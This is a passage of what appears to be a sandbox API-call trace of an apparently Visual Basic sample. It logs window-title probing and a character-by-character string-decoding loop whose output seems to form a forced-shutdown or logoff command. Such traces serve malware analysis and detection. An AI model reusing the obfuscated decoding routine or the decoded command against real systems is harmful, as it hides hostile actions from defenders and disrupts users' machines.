lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.188] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.189] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.189] GetForegroundWindow () returned 0x20086 [0180.189] GetLastError () returned 0x0 [0180.189] SysStringLen (param_1=" ") returned 0xff [0180.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.189] SysStringLen (param_1=" ") returned 0xff [0180.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.190] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.190] GetLastError () returned 0x0 [0180.190] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.190] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.191] SysStringLen (param_1="Prog") returned 0x4 [0180.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x1150ca4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0180.191] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0180.191] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0180.191] GetFocus () returned 0x0 [0180.191] lstrlenA (lpString="Prog") returned 4 [0180.191] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0180.191] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Fold") returned 4 [0180.192] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0180.192] GetFocus () returned 0x0 [0180.192] lstrcmpA (lpString1="Fold", lpString2="Prog") returned -1 [0180.192] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.192] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0180.192] IsWindow (hWnd=0x103c4) returned 1 [0180.192] IsWindow (hWnd=0x103c4) returned 1 [0180.193] IsWindow (hWnd=0x103c4) returned 1 [0180.193] IsWindow (hWnd=0x103c4) returned 1 [0180.193] GetFocus () returned 0x0 [0180.194] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0180.194] GetFocus () returned 0x0 [0180.194] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0180.194] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0180.194] GetFocus () returned 0x0 [0180.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0180.194] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.194] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.196] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0180.196] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.199] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0180.200] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.200] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0180.201] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.202] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.202] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.202] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.203] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.203] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.204] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.204] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.205] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.205] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.205] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.206] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.206] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.207] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.207] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.208] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.208] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.208] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.209] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.209] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.209] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.210] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.210] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.211] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.211] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.212] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.213] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.213] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.213] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.214] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.214] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.215] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.215] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.216] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.216] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.217] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.217] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.217] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.218] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.218] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.218] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.219] GetForegroundWindow () returned 0x20086 [0180.219] GetLastError () returned 0x0 [0180.219] SysStringLen (param_1=" ") returned 0xff [0180.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.219] SysStringLen (param_1=" ") returned 0xff [0180.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.219] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.219] GetLastError () returned 0x0 [0180.220] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.220] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.220] SysStringLen (param_1="Pro") returned 0x3 [0180.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x116859c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0180.220] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0180.220] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0180.221] GetFocus () returned 0x0 [0180.221] lstrlenA (lpString="Pro") returned 3 [0180.221] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0180.221] IsWindow (hWnd=0x103c4) returned 1 [0180.221] IsWindow (hWnd=0x103c4) returned 1 [0180.221] IsWindow (hWnd=0x103c4) returned 1 [0180.222] IsWindow (hWnd=0x103c4) returned 1 [0180.222] GetFocus () returned 0x0 [0180.222] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0180.222] GetFocus () returned 0x0 [0180.222] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0180.223] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0180.223] GetFocus () returned 0x0 [0180.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0180.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0180.223] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.223] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.224] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.224] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.225] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.225] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, 